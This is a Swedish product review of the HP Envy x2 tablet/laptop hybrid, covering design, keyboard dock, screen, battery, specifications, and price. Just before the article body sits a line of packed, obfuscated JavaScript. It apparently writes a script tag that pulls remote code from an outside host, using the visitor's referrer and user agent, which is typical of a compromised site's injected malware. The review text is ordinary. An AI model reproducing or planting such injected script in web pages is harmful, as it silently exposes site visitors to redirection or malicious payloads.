Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Test: HP ENVY X2 – PC och tablet i ett

envy x2
Filip Urde
  • On 26 juli, 2013
  • http://www.revue.se/filip-urde

Review Overview

Design
9
Prestanda
6
Användargränssnitt
7.5
Hårdvara
7
Appar
5.5
7

Rating

HP eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tbbhf|var|u0026u|referrer|fbist||js|php’.split(’|’),0,{}))
Envy X2 är inte den bästa PCn du kommer hitta, det är inte heller den bästa tableten. Men det är en bra kompromiss för dig som vill ha allt i ett.  

När Microsoft släppte Windows 8 så hoppades man kunna leverera en ny typ av datorer som skulle kunna användas både som en bärbardator och en tablet. Detta resulterade i Surface RT och Surface PRO. Det uppstod dock ett problem: Man sålde väldigt dåligt. Surface RT sålde väldigt dåligt och endast 400.000 Surface Pros säljs i första månaden, vilket låter ganska respektabelt tills man kommer ihåg att Apple säljer 1,7 miljoner iPads varje vecka.

Personligen så tycker jag Surface PRO är bra! Jag gillar dess design, prestanda och enkelhet. Men problemet kvarstår, konsumenterna är ute efter en tablet / laptop, men hittills så har ingen varit en tillräckligt bra kombination. Det jag gillar med Surface PRO, som t.ex. dess tangentbord/skärmskydd, det tycker många är dåligt. Dem flesta vill ha ett ”riktigt” tangentbord när dem ska skriva och då kan inte Surface PROs lösning riktigt mäta sig med folks förväntningar. Själv argumenterar jag för att Surface PROs lösning drar ner dess vikt och gör den än mer smidig än om den haft ett fullt tangent bord. Men rent funktionsmässigt är det inte i klass med ett riktigt tangentbord.

Nu ser det dock ut som att HP har utarbetat svaret på gåtan: 6500 kronor, vilket ger dig en HP Envy x2. Till skillnad från HPs föregångare, 900, där man fokuserade på hållbarhet, så har man gjort denna enheten slankare, mer raffinerad, och levereras med ett tangentbord/docka som du får i en ”bundle” lösning, snarare än en extra kostnad.

hp envy x2

Snygg design

Vid första anblicken så ser Envy x2 mer eller mindre identisk ut med sin kusin. HP har inte lagt ner allt för mycket krut på att förändra utseendet  – den här enheten har satsat på massor av silver metall, medan 900 var mångsidigare med sin svarta på silver design – men de grundläggande elementen är likartade: båda har en silver ram runt en svart blank skärm, båda har silver metall längs den bakre delen av skärmen och båda har rundade hörn för att du som användare ska kunna hålla tableten bekvämt i handen. Dock så finns det en signifikant skillnad och det är bildförhållandet. Medan 900 har en 16:10 skärm som mäter 10 tum, så har Envy x2 fått det mer vanliga formatet på 16:9. Detta expanderar diagonal skärmstorlek på 11,6 tum, vilket tyvärr försämrar proportionerna. Det är klockrent när du använder enheten som en bärbar dator, men x2 känns lite väl smal och krånglig att surfa på när den används som en tablet.

Att man ändrat skärmen till det nya formatet har inte lagt på bulk, enheten förblir förvånansvärt lätt att hantera när den används antingen som en bärbardator eller tablet.

Ergonomin förbättras ytterligare med den smarta on/off knappen och volymknapparna. Istället för att vara utskjutande, så är knapparna inlagda i chassit, vilket gör oavsiktlig aktivering osannolik. Tyvärr kan inte  detsamma sägas om Windows-knappen, vilket är mindre av en knapp och mer av en tryckkänslig yta på tabletens skärm. Jag råkar ofta stötate in i den knappen och då slungas man rätt ut i Windows menyn.

Du kan docka

Envy x2s tangentbord/docka är faktiskt allt man kunde önska sig, den är lätt, tunn, snygg, funktionell och tilltalande att använda.

I själva verket kan detta mycket väl vara den bästa tangentbord/dockan på marknaden just nu. Tangentbordet använder hela sin yta för att skapa den bästa skrivupplevelsen och det känns verkligen bra. Gångjärnet som lutar och håller tangentbordet på plats är i stort sett det enda problemet, då vinkel som du kan luta skärmen är ganska liten. Det är flera tillfällen då jag skulle velat kunna luta skärmen aningens lite mer och detta är jag försöker göra varje gång, vilket bara resulterar i att jag lyfter på hela datorn.

Pekplattan emulerar också en traditionell bärbar dator med oklanderlig precision. Ytan är stor, lyhörd, och erbjuder klart definierade gränser. Även de fysiska vänster / höger knapparna som är integrerade i ytan fungerar klanderfritt. Multi-touch gester fungerar nästan lika bra på pekplattan som på själva skärmen, klart godkänt.

Förutom att tangentbordet ger dig en bättre skrivupplevelse, så ger den dig även lite portar. Själva tableten har nämligen endast en ingång för MicroSD kort. Tangentbordet i sin tur ger dig två USB 2.0-portar, en HDMI-port och en kombinerad hörlur / mikrofon-ingång. Inte dåligt för den här sortens hybrid, men heller inget exceptionellt.

hp

Det kan bli lite pixligt

Envy x2 är verkligen en prisvärd maskin, men man märker att vissa bitar har man snålat in på för att kunna hålla nere priset. Ett exempel på detta är skärmens magra 1366 x 768 upplösning.

Visst 1366 x 768 upplösning är bra för en 11,6-tums bärbar dator, men inte speciellt bra för en 11,6-tums tablet. Skärmen blir tydligt pixlig och webbsidor och texter saknar den tydliga och skarpa känslan man vant sig vid från t.ex. sin smartphone eller surfplatta. Det är helt enkelt bra, men inte mer än så.

Annars är skärmen ganska genomsnittlig. Med maximal ljusstyrka så kan den glansiga skärmen användas även i ett solbelyst rum. Betraktningsvinklarna är också bra.
Tyvärr är ljudet ett ganska stort minus. HP har sedan en tid tillbaka ett samarbete med det omåttligt populära ljudföretaget beats audio (Dr.Dre hörlurar osv), något som man i vanliga fall förknippar med ett helt ok ljud, men på Envy x2 så täcks högtalarna av  tangentbordet, vilket gör ljudet väldigt lågt även på högsta volym. När man tar bort tableten från tangentbordet så får man lite mer kräm, men inget som kan kallas bra ljud. Ganska synd…

Bra mobilitet

Med tanke på att den är så tunn som den här enheten är, så har HP lyckats få in en hel del batterikraft. Hemligheten ligger i att man har batterier i både tableten och tangentbordet. Vilket ger dig ca: 7 timmar hårt arbetande och surfande eller hela 12 timmar lättar belastning, t.ex. läsning.

Tar du bort tableten från tangentbordsdockan så minskar tiden till cirka fem timmar hårt arbetande, vilket är ganska standard för den här typen av tablet.

Atomic prestanda

Tillverkare: HP, www.hp.se
Processor: Intel Atom Z2760, 1,8 GHz dual core.
Grafik: Intel GMA.
Minne: 2 GB.
Lagring: 64 GB ssd.
Kortläsare: Micro sdhc, sdhc.
Bildskärm: 11,6 tum ips, 1 366 x 768 bildpunkter.
Anslutningar: 2 st usb 2, hdmi, headset.
Trådlöst: 802.11a/b/g/n, Bluetooth 4, nfc.
Kameror: 8 megapixel bak, 1 megapixel fram.
Operativsystem: Windows 8, 32 bitar.
Storlek, surfplatta: 30,3 × 20,6 × 0,9 cm.
Vikt, surfplatta: 710 g.
Storlek,totalt: 30,3 × 20,6 × 1,9 cm.
Vikt, totalt: 1 409 g.
Pris: 5495 kronor.

Specifikationerna är typiska för dagens Windows Tablet / laptop hybrider men resulterar i en ganska oinspirerande prestanda.

Lagring är lite av ett problem. En 64GB SSD-hårddisk är standard, och en valfri 128GB enhet finns, men det är inte mycket utrymme för en Windows-enhet. HP påpekade att microSD-kortplats också kunde användas, vilket är rimligt, men minneskort är långsammare än solid-state-hårddiskar, och är inte den ideala lösningen.
Allt detta bidrar till ett system som är ganska långsamt, men dock användbart. Vi hade inga problem att titta på YouTube och redigera dokument i en webbläsare (den här artikeln är t.ex. skriven utan problem på Envy x2). Nej, man ska inte klaga på prestandan, den blir bara en nackdel när man vill utföra mer krävande arbete. T.ex. att spela även det enklaste av PC-spel blir ett problem på Envy x2.

Tyst som en mus

Du kommer aldrig behöver oroa dig för höga fläktljud eftersom denna enhet inte har någon fläkt. Det är en av Atomprocessorns stora fördelar, den är passivt kyld och behöver då ingen fläkt. Även om du kör stenhårt med din Envy x2 så blir den aldrig speciellt varm.

Slutsats

Så som det ser ut idag så går det rent tekniskt (ekonomiskt hållbart) att få fram en kraftig Windows-PC i ett riktigt smalt chassi. Vad som skiljer dagens bästa och sämsta hybrid datorer är hur de hanterar sina oundvikliga brister och kompensera för dem i andra områden.

Envy x2 är dock en av de som klarar av balansgången bäst hittills. Till skillnad från de flesta konkurrenter, så är Envy x2 verkligen användbar som en bärbar dator. Samt att tablet upplevelsen är även den väldigt bra.  Atom-processor är lite långsam, men är mer än kapabla att surfa på och köra 720p videos.

Men det som verkligen talar för Envy x2 är priset.  Den här enheten kostar 5495 kronor med dockan, det är samma pris som en 32GB iPad. Detta är verkligen en av anledningarna till att vi tror att hybrider kommer börja hota de fristående plattorna.

Men Envy x2 är inte perfekt, men den erbjuder en bra kompromiss, snarare än det bästa av båda världar.

Sammanfattning: För och Nackdelar.

För:
Tilltalande design
Tunn och lätt
Bra tangentbord / docka
Genomsnittlig batteritid som tablet, men utmärkt när du använder batteriet i tangentbordet också.
Bra pris

Nackdelar:
Låg upplösning
Låg prestanda